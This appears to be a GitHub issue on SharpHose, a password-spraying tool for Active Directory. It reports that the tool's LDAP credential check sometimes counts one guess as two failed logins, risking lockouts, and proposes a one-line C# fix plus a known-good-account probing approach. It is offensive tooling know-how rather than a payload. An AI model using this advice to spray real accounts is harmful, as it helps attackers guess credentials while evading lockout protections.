SharpHose icon indicating copy to clipboard operation
SharpHose copied to clipboard
verified publisher icon ustayready

Credentials will sometimes be tried twice, increasing the likelihood of a lockout

Open nidem opened this issue 10 months ago • 0 comments

The ValidateCredentials function will sometimes try a password twice if the context fails to negotiate.

Reference: https://stackoverflow.com/questions/31374578/authenticate-against-active-directory-once-counts-as-two-invalid-logins

The line leading to this is here:

https://github.com/ustayready/SharpHose/blob/b579c202a4ab0eea190555206f90dd148bb097dc/SharpHose/Nozzles/LDAP/LDAPNozzle.cs#L287

IMO, there are two ways to mitigate this.

Option 1: Explicitly set the context

With ValidateCredentials, explicitly set the context options to ContextOptions.Negotiate | ContextOptions.Signing | ContextOptions.Sealing.

New line 287

return context.ValidateCredentials(username, password, ContextOptions.Negotiate | ContextOptions.Signing | ContextOptions.Sealing);

This is what MS defaults to, but if Negotiate | Signing | Sealing fails it will try SimpleBind | SecureSocketLayer which leads to two failed guesses.

I don't know if there are situations where if you explicitly set Negotiate | Signing | Sealing if it will fail artificially (due to bind, not bad creds).

Option 2: Try different context options with a known good user

If you have a known good user creds, try explicitly using Negotiate | Singing | Sealing. If that fails, then try SimpleBind | SecureSocketLayer and use that for all password guessing.

nidem avatar Apr 18 '25 18:04 nidem